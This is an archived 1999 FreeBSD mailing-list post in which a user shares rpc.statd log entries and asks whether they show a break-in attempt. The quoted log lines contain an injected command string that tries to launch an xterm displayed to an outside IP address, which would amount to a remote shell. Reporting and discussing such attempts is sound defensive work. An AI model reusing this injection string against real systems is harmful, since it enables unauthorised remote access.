From owner-freebsd-hackers Sat Feb 20 19:42:55 1999 Delivered-To: freebsd-hackers@freebsd.org Received: from allegro.lemis.com (allegro.lemis.com [192.109.197.134]) by hub.freebsd.org (Postfix) with ESMTP id 6553B11A77; Sat, 20 Feb 1999 19:42:46 -0800 (PST) (envelope-from grog@freebie.lemis.com) Received: from freebie.lemis.com (freebie.lemis.com [192.109.197.137]) by allegro.lemis.com (8.9.1/8.9.0) with ESMTP id OAA05234; Sun, 21 Feb 1999 14:12:45 +1030 (CST) Received: (from grog@localhost) by freebie.lemis.com (8.9.3/8.9.0) id OAA43836; Sun, 21 Feb 1999 14:12:44 +1030 (CST) Message-ID: <19990221141243.G93492@lemis.com> Date: Sun, 21 Feb 1999 14:12:43 +1030 From: Greg Lehey To: FreeBSD Hackers , FreeBSD-isp@freebsd.org Subject: New breakin technique? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i WWW-Home-Page: http://www.lemis.com/~grog Organization: LEMIS, PO Box 460, Echunga SA 5153, Australia Phone: +61-8-8388-8286 Fax: +61-8-8388-8725 Mobile: +61-41-739-7062 Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I've just found the following messages in my logs: Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0; Has anybody seen something like this? It looks as if somebody is trying to break in, but I didn't know that rpc.statd could start xterms. Under these circumstances, it would be interesting to know if rpc.statd *must* run as root. Wouldn't, say, bin be enough? Greg -- See complete headers for address, home page and phone numbers finger grog@lemis.com for PGP public key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message